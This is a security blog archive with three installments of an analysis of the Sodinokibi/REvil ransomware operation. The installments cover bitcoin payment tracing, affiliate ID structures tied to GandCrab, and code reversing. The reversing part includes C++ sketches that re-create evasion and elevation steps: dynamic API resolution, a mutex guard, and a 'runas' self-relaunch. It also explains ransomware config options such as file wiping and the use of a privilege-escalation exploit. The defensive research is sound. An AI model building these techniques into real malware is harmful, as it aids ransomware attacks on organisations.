Category Archives: McAfee Labs

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Follow The Money

Episode 3: Follow the Money

This is the third installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandCrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid 2019.

The Talking Heads once sang “We’re on a road to nowhere.” That is exactly how it can feel when investigating the financial trails behind a RaaS scheme with its many affiliates.

However, we persisted, and we prevailed. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue; even getting detailed insights into what the affiliates do with their earnings following a successful attack.

With the Sodinokibi ransomware, a unique BTC wallet is generated for each victim. As long as no payment is made, no trace of the BTC wallet will be available on the blockchain. The blockchain operates as a public ledger of all bitcoin transactions that have happened; when no currency is exchanged, no transactions are recorded. Although many victims hit the news, we understand that, if they did pay, sharing that information with the research community may be a bridge too far. On one of the underground forums we discovered the following post:

In this post the actors are expanding their successful activity and offering a 60 percent cut as a start and, after three successful payments by the affiliate (read successful ransomware infections and payments received from the victims), the cut increases to 70 percent of the payments received. This is very common as we saw in the past with RaaS schemes like GandCrab and Cryptowall.

Responding to this post is an actor with the moniker of ‘Lalartu’ and his comments are quite interesting, hinting he was involved with GandCrab. As a side note: ‘Lalartu’ means ‘ghost/phantom’. Its origins are in the Sumerian civilization, where Lalartu was seen as a vampiric demon.

Researching the moniker of ‘Lalartu’ through our data, we went back in time a month or so and discovered a posting from the actor on June 4th of 2019, again referencing GandCrab.

We observe here a couple of transaction IDs (TXID) on the bitcoin ledger, however they are incomplete. More than a week later, on June 17th, 2019, “Lalartu” posted another one with an attachment to it:

 

In this posting we see a screenshot with partial TXIDs and the amounts. With the help of the Chainalysis software and team, we were able to retrieve the full TXIDs. With that list we were able to investigate the transactions and start mapping them out with their software:

From the various samples we have researched, the ransom amounts asked are between 0.44 and 0.45 BTC, equivalent to roughly 4,000 USD at the time.

In the above screenshot we see the transactions where some of these amounts are transferred from a wallet, or bitcoins are bought at an exchange and transferred to the wallets associated with the affiliate(s).

Based on the list shared by Lalartu in his post, and the average value of bitcoin around the dates, within 72 hours a value of 287,499.00 USD of ransom had been transferred.

Taking the list of transactions as a starting point in our graph-analysis, we colored the lines red and started from there to investigate the wallets involved and interesting transactions:

Although it might look like spaghetti, once you dive in, very interesting patterns can be discovered. We see victims paying to their assigned wallets; from there it takes an average of two to three transactions before the money reaches an ‘affiliate’ or ‘distribution’ wallet. From that wallet we see the split happening, exactly as the actor ‘UNKN’ described in the forum post we started this article with. The 60 or 70 percent stays with the affiliate and the remaining 40/30 percent is forwarded in multiple transactions towards the actors behind Sodinokibi.

Once we identified a couple of these transactions, we started to dig in both directions. What is the affiliate doing with the money and where is the money going for the Sodinokibi actors?

We picked one promising affiliate wallet, started to dig deeper and followed the transactions. As described above, the affiliate mostly receives the money through an exchange (since this is what the actors advise in the ransom note). This is what we see in the example below: incoming ransomware payments are received via Coinbase.com. The affiliate seems to pay a fee to a service but also sends BTC to BitMix.biz, a popular underground bitcoin mixer that obfuscates the subsequent transactions to make it difficult to link them back to the ‘final’ wallet or a cash-out into a (crypto) currency.

We also observed examples where affiliates were paying for services they bought on Hydra Market. Hydra Market is a Russian underground marketplace where many services and illegal products are offered, with payment in BTC.

Tracing down the route of splits, we started to search for the 30 or 40 percent cuts of the ransom payments of 0.27359811 BTC or, if the price was doubled, 0.54719622 BTC.

Using the list of amounts and querying the transactions and transfers discovered, we observed a wallet that was receiving a lot of these smaller payments. Due to ongoing research we will not publish the wallet but here is a graph representation of a subset of transactions:

It looks like a spider: many incoming ‘split’ transfers and only a few outgoing transactions with larger amounts of bitcoin.

If we take the average of $2,500 – $5,000 USD as a ransom ask, and the mentioned split of 30/40 percent for the actor maintaining the Sodinokibi ransomware and affiliate infrastructure, they make $700 – $1,500 USD per paid infection.

We already saw in the beginning of this article that the affiliate Lalartu claimed to have made 287k USD in 72 hours, which is an 86k USD profit for the actor from one affiliate only.

In episode 2, The All-Stars, we explained how the structure is set up and how each affiliate has its own ID.

As far as we tracked the samples and extracted the ID numbers, we counted over 41 active affiliates. The data showed that, in a relatively short amount of time, the velocity and number of infections were high. Taking this velocity, combined with a few payments per day, into account, we can imagine that the actors behind Sodinokibi are making a fortune.

Following the traces of one particular affiliate, we ended up seeing large amounts of bitcoin being transferred into a wallet with a total value of 443 BTC, around 4.5 million USD at the average bitcoin price.

We do understand that there are situations in which executives decide to pay the ransom but, by doing that, we keep this business model alive and also fund other criminal markets.

Conclusion

In this blog we focused on insights into the financial streams behind ransomware. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue. In some cases, we were able even to get detailed insights into what the affiliates do with their earnings following a “successful” attack. It shows that paying ransomware is not only keeping the ‘ransom-model’ alive but is also supporting other forms of crime.

In the next and final episode, “Crescendo,” McAfee ATR reveals insights gleaned from a global network of honeypots.


McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – The All-Stars

Episode 2: The All-Stars

Analyzing Affiliate Structures in Ransomware-as-a-Service Campaigns

This is the second installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandCrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid-2019.

GandCrab announced its retirement at the end of May. Since then, a new RaaS family called Sodinokibi, aka REvil, took its place as one of the most prolific ransomware campaigns.

In episode one of our analysis on the Sodinokibi RaaS campaign we shared our extensive malware and post-infection analysis, which included code comparisons to GandCrab, and insight on exactly how massive the new Sodinokibi campaign is.

The Sodinokibi campaigns are still ongoing and differ in execution due to the different affiliates spreading the ransomware. This raises more questions, such as: how do the affiliates operate? Is the affiliate model working? What can we learn about the campaign, and possible connections to GandCrab, by investigating the affiliates?

It turns out, through large-scale sample analysis and hardcoded value aggregation, we were able to determine which affiliates played a crucial role in the success of GandCrab’s criminal enterprise and found a lot of similarity between the RaaS enterprise of GandCrab and that of Sodinokibi.

Before we begin with the Sodinokibi analysis and comparison we will briefly explain the methodology that we used for GandCrab.

GandCrab RaaS System

GandCrab was a prime example of a Ransomware-as-a-Service. RaaS follows a structure where the developers are offering their product to affiliates, partners or advertisers who are responsible for spreading the ransomware and generating infections. The developers take a percentage of the earned income and provide the other portion to the affiliates.

FIGURE 1. HIGH LEVEL OVERVIEW OF THE GANDCRAB RAAS MODEL

Operating a RaaS model can be lucrative for both parties involved:

  • Developer’s perspective: The malware author/s request a percentage per payment for use of the ransomware product. This way the developers have less risk than the affiliates spreading the malware. The developers can set certain targets for their affiliates regarding the amount of infections they need to produce. In a way, this is very similar to a modern sales organization in the corporate world.

Subsequently, a RaaS model offers malware authors a safe haven when they operate from a country that does not regard developing malware as a crime. If their own nation’s citizens are not victimized, the developers are not going to be prosecuted.

  • Affiliate perspective: As an affiliate you do not have to write the ransomware code yourself; less technical skill is involved. RaaS makes ransomware more accessible to a greater number of users. An affiliate just needs to be accepted in the criminal network and reach the targets set by the developers. As a service model it also offers a level of decentralization where each party sticks to their own area of expertise.

Getting a Piece of the Pie

Affiliates want to get paid proportionate to the infections they made; they expose themselves to a large amount of risk by spreading ransomware and they want to reap the benefits. Mutual trust between the developer and the affiliate plays a huge role in joining a RaaS system. It is very much like the expression: “Trust, hard to build, and easy to lose” and this largely explains the general skepticism that cybercriminal forum members display when a new RaaS system is announced.

For the RaaS service to grow and maintain their trust, proper administration of infections/earnings per affiliate plays an important part. Through this, the developers can ensure that everyone gets an honest piece of the proverbial “pie”. So how can this administration be achieved? One way is having hardcoded values in the ransomware.

Linking the Ransomware to Affiliates

Through our technical malware analysis, we established that, starting from version 4, GandCrab included certain hardcoded values in the ransomware source code:

  • id – The affiliate id number.
  • sub_id – The Sub ID of the affiliate ID; a tracking number the affiliate uses when sub-renting infections or when tracking their own campaigns, identifiable via the sub_id number.
  • version – The internal version number of the malware.

Version 4 had significant changes overall and we believe that these changes were partly done by the authors to improve administration and make GandCrab more scalable to cope with its increased popularity.

Based on the hardcoded values it was possible for us, to a certain extent, to extract the administration information and create our own overview. We hunted for as many different GandCrab samples as we could find, using Yara rules, industry contacts and customer submissions. The sample list we gathered is quite extensive but not exhaustive. From the collected samples we extracted the hardcoded values and compile times automatically, using a custom-built tool. We aggregated all these values in one giant timeline from GandCrab version 4 all the way up to version 5.2.

FIGURE 2. SMALL PORTION OF THE TIMELINE OF COLLECTED SAMPLES (NOTE THE FIRST FOUR POSSIBLY TIME STOMPED)

ID and SUB_ID Characteristics Observed

Parent-Child Relationship
The extracted ID’s and Sub_IDs showed a parent-child relationship, meaning every ID could have more than one SUB_ID (child) but every SUB_ID only had one ID (parent).

FIGURE 3. THE ACTIVITY OF ID NUMBER 41 (PARENT) AND ITS CORRESPONDING SUB_IDs (CHILDREN)
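To illustrate how this kind of administration can be reconstructed from the extracted values, the minimal C++ sketch below groups (id, sub_id) pairs into the parent-child structure described above. The input file name and its comma-separated format are hypothetical; it assumes the hardcoded values have already been pulled from the samples by a separate extraction step.

#include <fstream>
#include <iostream>
#include <map>
#include <set>
#include <sstream>
#include <string>

int main() {
    // Hypothetical input: one "id,sub_id,version" line per unpacked sample.
    std::ifstream in("extracted_values.csv");
    std::map<int, std::set<int>> affiliates;   // parent id -> set of child sub_ids
    std::string line;
    while (std::getline(in, line)) {
        std::stringstream ss(line);
        std::string id, sub_id, version;
        if (std::getline(ss, id, ',') && std::getline(ss, sub_id, ',') &&
            std::getline(ss, version, ',')) {
            affiliates[std::stoi(id)].insert(std::stoi(sub_id));
        }
    }
    // Every ID (parent) can have several SUB_IDs (children), never the reverse.
    for (const auto& entry : affiliates) {
        std::cout << "id " << entry.first << " -> " << entry.second.size()
                  << " sub_id(s)\n";
    }
    return 0;
}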

ID Increments
Overall, we observed a gradual increment in the ID number over time. The earlier versions generally had lower ID numbers and higher ID numbers appeared with the later versions.

However, there were relatively lower ID numbers that appeared in many versions, as shown in figure 3.

This observation aligned with our theory that the ID number corresponds with a particular affiliate. Certain affiliates remained partners for a long period of time, spreading different versions of GandCrab; this explains the ID number appearing over a longer period and in different versions. This theory has also been acknowledged by several (anonymous) sources.

Determining Top ID’s/Affiliates
When we applied the theory that the ID corresponded with an affiliate, we observed different activity amongst the affiliates. Some affiliates/IDs were linked to only a single sample that we found. An affiliate appearing only briefly can be explained by a failure to perform: the GandCrab developers had a strict policy of expelling affiliates that underperformed. Expelling an affiliate would open a new slot that would receive a new, incremented ID number.

On the other hand, we observed several very active affiliates, “The All-Stars”, of which ID number 99 was by far the most active. We first observed ID 99 in six different samples of version 4.1.1, growing to 35 different samples in version 5.04. Based on our dataset we observed 71 unique unpacked samples linked to ID 99.

Being involved with several versions (consistency over time), in combination with the number of unique samples (volume) and the number of infections (based on industry malware detections) can effectively show which affiliate was the most aggressive and possibly the most important to the RaaS network.

Affiliate vs. Salesperson & Disruption

An active affiliate can be compared to a top salesperson in any normal commercial organization. Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, identifying and disrupting a top affiliate’s activity can have a crippling effect on the income of the RaaS network, internal morale and overall RaaS performance. This can be achieved through arrests of an affiliate and/or co-conspirers.

Another way is disrupting the business model and lowering the ransomware’s profits through offering free decryption tools or building vaccines that prevent encryption. The disruption will increase the operational costs for the criminals, making the RaaS of less interest.

Lastly, for any future proceedings (suspect apprehension and legal) it is important to maintain a chain of custody linking victims, samples and affiliates together. Security providers as gatherers and owners of this data play a huge role in safeguarding this for the future.

Overview Versions and ID Numbers

Using an online tool from RAWGraphs we created a graphic display of the entire dataset showing the relationship between the versions and the ID numbers. Below is an overview, a more detailed overview can be found on the McAfee ATR Github.

FIGURE 4. OVERVIEW OF GANDCRAB VERSIONS AND IDs

Top performing affiliates immediately stood out from the rest as the lines were thicker and more spread out. According to our data, the most active ID numbers were 15, 41, 99 and 170. Determining the key players in a RaaS family can help Law Enforcement prioritize its valuable resources.

Where are the All-Stars? Top Affiliates Missing in 5.2

At the time we did not fully realize it but, looking back at the overview, it stands out that none of the top affiliate/ID numbers were present in the final version 5.2 of GandCrab, which was released in February. We believe that this was an early indicator that the end of GandCrab was imminent.

This discovery might indicate that some kind of event had taken place that resulted in the most active affiliates not being present. The cause could have been internal or external.

But what puzzles us is why would a high performing affiliate leave? Maybe we will never hear the exact reason. Perhaps it is quite similar to why people leave regular jobs… feeling unhappy, a dispute or leaving for a better offer.

With the absence of the top affiliates, the question remains: where did these affiliates go?

FIGURE 5. ID AND SUB_ID NUMBER LINKED TO VERSION 5.2

Please note that the active ID numbers 15, 41, 99 and 170 from the complete overview are not present in any GandCrab version 5.2 infections. The most active affiliate in version 5.2 was number 287.

Goodbye GandCrab, Hello Sodinokibi/REvil

In our opening episode we described the technical similarities we have seen between GandCrab and REvil. We are not the only ones that noticed these similarities – security reporter Brian Krebs published an article where he highlights the similarities between GandCrab and a new ransomware named Sodinokibi or REvil, and certain postings that were made on several underground forums.

Affiliates Switching RaaS Families….

On two popular underground forums a user named UNKN, aka unknown, placed an advertisement on the 4th of July 2019 for a private ransomware-as-a-service (RaaS) he had been running for some time. Below is a screenshot of the posting. The response from a user with the nickname Lalartu is particularly interesting. In a reply to the advertisement, Lalartu mentions that he is working with UNKN and his team and that they had been former GandCrab affiliates, something that was also noticed by BleepingComputer. Lalartu’s post supports our earlier observations that some top GandCrab affiliates suddenly disappeared and might have moved to a different RaaS family. This is something that was suspected but never confirmed with technical evidence.

We suspect that Lalartu is not the only GandCrab affiliate that has moved to Sodinokibi. If top affiliates have a solid and very profitable infection method available, then it does not make sense to retire with the developers.

Around February 2019, there was a noticeable change in the infection behavior of some GandCrab campaigns. Managed Service Providers (MSPs) were now targeted through vulnerable systems and their customers got infected with GandCrab on a large scale, something we had not seen performed before by any of the affiliates. Interestingly, shortly after the retirement of GandCrab, the MSP modus operandi was quickly adopted by Sodinokibi, another indication that a former GandCrab affiliate had moved to Sodinokibi.

This makes us suspect that Sodinokibi is actively recruiting the top performing affiliates from other successful RaaS families, creating a sort of all-star team.

At the same time, the RaaS market is such where less proficient affiliates can hone their skills, improve their spreading capabilities and pivot to the more successful RaaS families. Combined with a climate where relatively few ransomware arrests are taking place, it allows for an alarming cybercriminal career path with dire consequences.

Gathering “administration” from Sodinokibi/REvil Samples

Another similarity Sodinokibi shares with GandCrab is the administration of infections, one of the indicators of a RaaS’s growth potential. In our earlier blog we discussed that Sodinokibi generates a JSON config file for each sample containing certain values such as a PID number and a value labeled sub. So, we decided to use our GandCrab affiliate methodology on the Sodinokibi config files we were able to collect.

With GandCrab we had to write our own tool to pull the hardcoded indicators but, with Sodinokibi, we were lucky enough that Carbon Black had developed a tool that did much of the heavy lifting for us. In the end there were still some samples from which we had to pull the configs manually. The JSON file contains different values and fields; for a comparison to GandCrab we focused on the PID and SUB field of each sample as these values appeared to have a similar characteristic as the ID and SUB_ID field in the GandCrab samples.

FIGURE 6. REVIL JSON CONFIG VALUES

Interpreting the Data Structures

With the data we gathered, we used the same analysis methodology on Sodinokibi  as we did on GandCrab. We discovered that Sodinokibi has a RaaS structure very similar to GandCrab and with the Parent-Child relationship structure being nearly identical. Below we compared activity of GandCrab affiliate number 99 with the activity of the Sodinokibi affiliate number 19.

FIGURE 7. THE ACTIVITY OF GANDCRAB ID NO 99 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

FIGURE 8. THE ACTIVITY OF SODINOKIBI PID NO 19 (PARENT) AND ITS CORRESPONDING SUB (CHILDREN)

It needs to be said that the timespan for the GandCrab overview was generated over a long period of time with a larger total of samples than the Sodinokibi overview.

Nevertheless, the similarity is quite striking.

The activity of both ID numbers displays a tree-shaped structure with the parent ID number at the root and branching out to the respective SUB numbers linked to multiple samples.

We believe that the activity above might be linked to a tiered affiliate group that is specialized in RDP brute forcing and infecting systems with Sodinokibi after each successful compromise.

Both RaaS family structures are too large to effectively publish within the space of this blog. Our Complete overview for the Sodinokibi RaaS structure can be found on our McAfee GitHub.

Conclusion

When we started our journey with GandCrab we did not expect it would take us so far down the rabbit hole. Mass sample analysis and searching for administration indicators provided a way to get more insight in a multi-million-dollar criminal enterprise, determine key players and foresee future events through changes in the business structure. We believe that the retirement of GandCrab was not an overnight decision and, based on the data on the affiliates, it was clear that something was going to happen.

With the emergence of Sodinokibi and the few forum postings by a high profile former GandCrab affiliate, everything fell into place. We have strong indications that some of the top affiliates have found a new home with Sodinokibi to further their criminal business.

Given that the income of the RaaS network is largely dependent on the performance of its top affiliates, and it is run like a normal business, we (the security industry) should not only research the products the criminals develop, but also identify possible ways to successfully disrupt the criminal business.

In our next episode we dive deeper into the financial streams involved in the affiliate program and provide an estimate of how much money these actors are earning with the ransomware-as-a-service business model.


McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us

Episode 1: What the Code Tells Us

McAfee’s Advanced Threat Research team (ATR) observed a new ransomware family in the wild, dubbed Sodinokibi (or REvil), at the end of April 2019. Around this same time, the GandCrab ransomware crew announced they would shut down their operations. Coincidence? Or is there more to the story?

In this series of blogs, we share fresh analysis of Sodinokibi and its connections to GandCrab, with new insights gleaned exclusively from McAfee ATR’s in-depth and extensive research.

  • Episode 1: What the Code Tells Us
  • Episode 2: The All-Stars
  • Episode 3: Follow the Money
  • Episode 4: Crescendo

In this first installment we share our extensive malware and post-infection analysis and visualize exactly how big the Sodinokibi campaign is.

Background

Since its arrival in April 2019, it has become very clear that the new kid in town, “Sodinokibi” or “REvil” is a serious threat. The name Sodinokibi was discovered in the hash ccfde149220e87e97198c23fb8115d5a where ‘Sodinokibi.exe’ was mentioned as the internal file name; it is also known by the name of REvil.

At first, Sodinokibi ransomware was observed propagating itself by exploiting a vulnerability in Oracle’s WebLogic server. However, similar to some other ransomware families, Sodinokibi is what we call a Ransomware-as-a-Service (RaaS), where a group of people maintain the code and another group, known as affiliates, spread the ransomware.

This model allows affiliates to distribute the ransomware any way they like. Some affiliates prefer mass-spread attacks using phishing campaigns and exploit kits, while other affiliates adopt a more targeted approach by brute-forcing RDP access and uploading tools and scripts to gain more rights and execute the ransomware in the internal network of a victim. We have investigated several campaigns spreading Sodinokibi, most of which had a different modus operandi, but we did notice that many started with the breach of an RDP server.

Who and Where is Sodinokibi Hitting?

Based on visibility from MVISION Insights we were able to generate the below picture of infections observed from May through August 23rd, 2019:

Who is the target? Mostly organizations, though it really depends on the skills and expertise of the different affiliate groups as to whom, and in which geography, they operate.

Reversing the Code

In this first episode, we will dig into the code and explain the inner workings of the ransomware once it has executed on the victim’s machine.

Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article.

Based on the code comparison analysis we conducted between GandCrab and Sodinokibi we consider it a likely hypothesis that the people behind the Sodinokibi ransomware may have some type of relationship with the GandCrab crew.

FIGURE 1.1. OVERVIEW OF SODINOKIBI’S EXECUTION FLOW

Inside the Code

Sodinokibi Overview

For this article we researched the sample with the following hash (packed):

The main goal of this malware, as other ransomware families, is to encrypt your files and then request a payment in return for a decryption tool from the authors or affiliates to decrypt them.

The malware sample we researched is a 32-bit binary, with an icon in the packed file and without one in the unpacked file. The packer is programmed in Visual C++ and the malware itself is written in pure assembly.

Technical Details

The goal of the packer is to decrypt the true malware part and use a RunPE technique to run it from memory. To obtain the unpacked malware, we waited until the decryption was finished and the payload was loaded into memory, then dumped it from memory.

The first action of the malware is to resolve all functions needed at runtime and build a dynamic IAT, in an attempt to hide the Windows API calls from static analysis.

FIGURE 2. THE MALWARE GETS ALL FUNCTIONS NEEDED IN RUNTIME
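A minimal sketch of what such dynamic API resolution can look like is shown below. The specific APIs and the use of plain-text names are our own illustrative choices; real samples typically resolve a much larger set of functions, often from encrypted or hashed names.

#include <windows.h>

// Function-pointer types for APIs resolved at runtime.
typedef HANDLE (WINAPI *pCreateMutexW)(LPSECURITY_ATTRIBUTES, BOOL, LPCWSTR);
typedef BOOL   (WINAPI *pGlobalMemoryStatusEx)(LPMEMORYSTATUSEX);

struct DynamicIat {
    pCreateMutexW         CreateMutexW_;
    pGlobalMemoryStatusEx GlobalMemoryStatusEx_;
};

// Build a small "dynamic IAT": no static imports for these APIs appear in the
// import table, which complicates static analysis of the unpacked binary.
bool BuildIat(DynamicIat& iat) {
    HMODULE k32 = LoadLibraryW(L"kernel32.dll");
    if (!k32) return false;
    iat.CreateMutexW_ = (pCreateMutexW)GetProcAddress(k32, "CreateMutexW");
    iat.GlobalMemoryStatusEx_ =
        (pGlobalMemoryStatusEx)GetProcAddress(k32, "GlobalMemoryStatusEx");
    return iat.CreateMutexW_ && iat.GlobalMemoryStatusEx_;
}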

The next action of the malware is to try to create a mutex with a hardcoded name. It is important to know that roughly 95% of the strings inside the malware are encrypted. Each sample of the malware has different strings in a lot of places; values such as keys or seeds change all the time to frustrate what we, as an industry, do: building vaccines or creating a single decryptor that works without taking the values from the specific malware sample to decrypt the strings.

FIGURE 3. CREATION OF A MUTEX AND CHECK TO SEE IF IT ALREADY EXISTS

If the mutex exists, the malware finishes with a call to “ExitProcess.” This is done to avoid re-launching of the ransomware.
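The logic boils down to the classic single-instance check sketched below; the mutex name is a placeholder, since the real hardcoded name changes per sample.

#include <windows.h>

void MutexGuard() {
    // Placeholder name -- in real samples the hardcoded mutex name differs per build.
    HANDLE hMutex = CreateMutexW(nullptr, TRUE, L"Global\\{PLACEHOLDER-MUTEX-NAME}");
    if (hMutex == nullptr || GetLastError() == ERROR_ALREADY_EXISTS) {
        // Another instance is already running: stop to avoid re-launching.
        ExitProcess(0);
    }
    // ...continue with the rest of the execution flow...
}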

After this mutex operation the malware calculates a CRC32 hash of a part of its data using a special seed that changes per sample too. This CRC32 operation is based on a CRC32 polynomial operation instead of tables to make it faster and the code-size smaller.

The next step is decrypting this block of data if the CRC32 check passes with success. If the check is a failure, the malware will ignore this flow of code and try to use an exploit as will be explained later in the report.

FIGURE 4. CALCULATION OF THE CRC32 HASH OF THE CRYPTED CONFIG AND DECRYPTION IF IT PASSES THE CHECK
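For reference, a table-less, polynomial-based CRC32 routine of the kind described looks roughly like the generic sketch below; it is not the malware’s exact code, and the per-sample seed is supplied by the caller.

#include <cstdint>
#include <cstddef>

// Bitwise (table-less) CRC32: smaller code size, slower than a table-driven version.
// The seed is supplied by the caller; in the samples it changes per build.
uint32_t Crc32NoTable(const uint8_t* data, size_t len, uint32_t seed) {
    uint32_t crc = ~seed;
    for (size_t i = 0; i < len; ++i) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; ++bit) {
            // 0xEDB88320 is the reflected CRC-32 polynomial.
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
        }
    }
    return ~crc;
}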

In the case that the malware passes the CRC32 check and decrypts the block correctly with a key that changes per sample, the result is a JSON config file in memory that will be parsed. This config file has fields to prepare the keys used later to encrypt the victim key, and more information that alters the behavior of the malware.

The CRC32 check prevents somebody from swapping another config into the encrypted data without also updating the CRC32 value in the malware.

After decryption of the JSON file, the malware will parse it with a full JSON parser, extract all fields and save the values of these fields in memory.

FIGURE 5. PARTIAL EXAMPLE OF THE CONFIG DECRYPTED AND CLEANED

Let us explain all the fields in the config and their meanings:

  • pk -> This value encoded in base64 is important later for the crypto process; it is the public key of the attacker.
  • pid -> The affiliate number that belongs to the sample.
  • sub -> The subaccount or campaign id for this sample that the affiliate uses to keep track of its payments.
  • dbg -> Debug option. In the final version this is used to check if certain things have been done or not; it is a development option that can be true or false. In the samples in the wild it is set to false. If it is set, the keyboard check later will not happen. It is useful for the malware developers to verify that the critical part of the malware works correctly without infecting their own machines, which would otherwise be excluded based on the language check.
  • fast -> If this option is enabled, and by default a lot of samples have it enabled, the malware will crypt the first 1 megabyte of each target file, or all files if it is smaller than this size. In the case that this field is false, it will crypt all files.
  • wipe -> If this option is ‘true’, the malware will destroy the target files in the folders described in the JSON field “wfld”. This destruction happens in all folders that have the name or names that appear in this field of the config, in logical units and network shares. The overwriting of the files can be with trash data or null data, depending on the sample.
  • wht -> This field has some subfields: fld -> folders that should not be encrypted; they are whitelisted to avoid destroying critical files in the system and programs; fls -> a whitelist of file names that will never be encrypted, again to avoid destroying critical files in the system; ext -> a list of extensions that should be skipped during encryption.
  • wfld -> A list of folders where the files will be destroyed if the wipe option is enabled.
  • prc -> List of processes to kill for unlocking files that are locked by this/these program/s, for example, “mysql.exe”.
  • dmn -> List of domains that will be used for the malware if the net option is enabled; this list can change per sample, to send information of the victim.
  • net -> This value can be false or true. By default, it is usually true, meaning that the malware will send information about the victim if they have Internet access to the domain list in the field “dmn” in the config.
  • nbody -> A big string encoded in base64 that is the template for the ransom note that will appear in each folder where the malware can create it.
  • nname -> The string of the name of the malware for the ransom note file. It is a template that will have a part that will be random in the execution.
  • exp -> This field is very important in the config. By default it will usually be ‘false’, but if it is ‘true’, or if the check of the hash of the config fails, it will use the exploit CVE-2018-8453. The malware has this value as false by default because this exploit does not always work and can cause a Blue Screen of Death that avoids the malware’s goal to encrypt the files and request the ransom. If the exploit works, it will elevate the process to SYSTEM user.
  • img -> A string encoded in base64. It is the template for the image that the malware will create in runtime to change the wallpaper of the desktop with this text.

After decrypting the malware config, the malware parses it and checks the “exp” field; if the value is ‘true’, it will detect the type of operating system using the PEB fields that report the major and minor version of the OS.

FIGURE 6. CHECK OF THE VERSION OF THE OPERATING SYSTEM

Usually only one OS version can be found, but that is enough for the malware. The malware will check the file time to verify whether the date is before or after the installation of the patch that fixes the exploit. If the file time is before the file time of the patch, it will check if the OS is 64-bit or 32-bit using the function “GetNativeSystemInfo”. When the OS is 32-bit, it will use a shellcode embedded in the malware that is the exploit and, in the case of a 64-bit OS, it will use another shellcode that can use a “Heaven’s Gate” to execute 64-bit code in a 32-bit process.

FIGURE 7. CHECK IF OS IS 32- OR 64-BIT

In the case that the field was false, or the exploit is patched, the malware will check the OS version again using the PEB. If the OS is at least Windows Vista, it will get the level of execution privilege from its own process token. When the discovered privilege level is less than 0x3000 (meaning that the process is not running as a real administrator in the system or as SYSTEM), it will relaunch the process using the ‘runas’ command to elevate from the 0x2000 or 0x1000 level of execution to 0x3000. After relaunching itself with the ‘runas’ command, the original malware instance finishes.

FIGURE 8. CHECK IF OS IS WINDOWS VISTA MINIMAL AND CHECK OF EXECUTION LEVEL
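The 0x1000/0x2000/0x3000 values correspond to the Windows integrity-level RIDs (low, medium and high), which suggests the check is performed on the token integrity level. A minimal reconstruction of that check and the ‘runas’ relaunch is sketched below; it is our interpretation of the logic, not the original code.

#include <windows.h>

DWORD GetIntegrityRid() {
    HANDLE hToken = nullptr;
    DWORD rid = 0, size = 0;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) return 0;
    GetTokenInformation(hToken, TokenIntegrityLevel, nullptr, 0, &size);
    if (auto* til = (TOKEN_MANDATORY_LABEL*)LocalAlloc(LPTR, size)) {
        if (GetTokenInformation(hToken, TokenIntegrityLevel, til, size, &size)) {
            // Last sub-authority of the label SID is the integrity RID:
            // 0x1000 = low, 0x2000 = medium, 0x3000 = high.
            rid = *GetSidSubAuthority(til->Label.Sid,
                      *GetSidSubAuthorityCount(til->Label.Sid) - 1);
        }
        LocalFree(til);
    }
    CloseHandle(hToken);
    return rid;
}

void ElevateIfNeeded() {
    if (GetIntegrityRid() < SECURITY_MANDATORY_HIGH_RID) {   // below 0x3000
        wchar_t self[MAX_PATH];
        GetModuleFileNameW(nullptr, self, MAX_PATH);
        // Relaunch through the "runas" verb and terminate the current instance.
        ShellExecuteW(nullptr, L"runas", self, nullptr, nullptr, SW_SHOWNORMAL);
        ExitProcess(0);
    }
}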

The malware’s next action is to check if the execution privilege is SYSTEM. When it is, the malware will find the “Explorer.exe” process, take the token of the user that launched that process and impersonate it. This is a downgrade from SYSTEM to a user with fewer privileges, done to avoid affecting the desktop of the SYSTEM user later.

After this it will parse the config again and gather information about the victim’s machine, such as the user name and the machine name. The malware prepares a victim ID, to know who is affected, based on two 32-bit values concatenated into one hexadecimal string.

The first of these two values is the serial number of the hard disk of the main Windows logical unit, and the second is the CRC32 hash of that serial number, computed with a hardcoded seed that changes per sample.

FIGURE 9. GET DISK SERIAL NUMBER TO MAKE CRC32 HASH
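A minimal reconstruction of that second value is sketched below; the seed is a placeholder, since real samples use a per-build value, and the Windows volume is assumed to be C:\.

#include <windows.h>
#include <cstdint>

// Minimal bitwise CRC32 (same idea as the routine sketched earlier).
static uint32_t Crc32(const uint8_t* d, size_t n, uint32_t seed) {
    uint32_t c = ~seed;
    while (n--) {
        c ^= *d++;
        for (int b = 0; b < 8; ++b) c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return ~c;
}

// Second half of the victim ID: CRC32 of the volume serial with a hardcoded,
// per-sample seed (placeholder below). The serial itself forms the first half.
uint32_t VolumeSerialHash() {
    DWORD serial = 0;
    GetVolumeInformationW(L"C:\\", nullptr, 0, &serial, nullptr, nullptr, nullptr, 0);
    return Crc32(reinterpret_cast<const uint8_t*>(&serial), sizeof(serial),
                 0xDEADBEEF /* placeholder seed */);
}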

After this, the result is used as a seed to compute the CRC32 hash of the name of the machine’s processor. This processor name is not extracted using the Windows API as GandCrab does; in this case the malware authors use the CPUID opcode to make it more obfuscated.

FIGURE 10. GET THE PROCESSOR NAME USING CPUID OPCODE

Finally, it converts these values in a string in a hexadecimal representation and saves it.
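Retrieving the processor brand string through the CPUID instruction instead of the Windows API can be done with a compiler intrinsic, as in this short sketch.

#include <intrin.h>
#include <cstring>

// Reads the 48-byte processor brand string via CPUID leaves 0x80000002-0x80000004.
void GetCpuBrand(char out[49]) {
    int regs[4] = {0};
    for (int leaf = 0; leaf < 3; ++leaf) {
        __cpuid(regs, 0x80000002 + leaf);
        std::memcpy(out + leaf * 16, regs, sizeof(regs));
    }
    out[48] = '\0';
}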

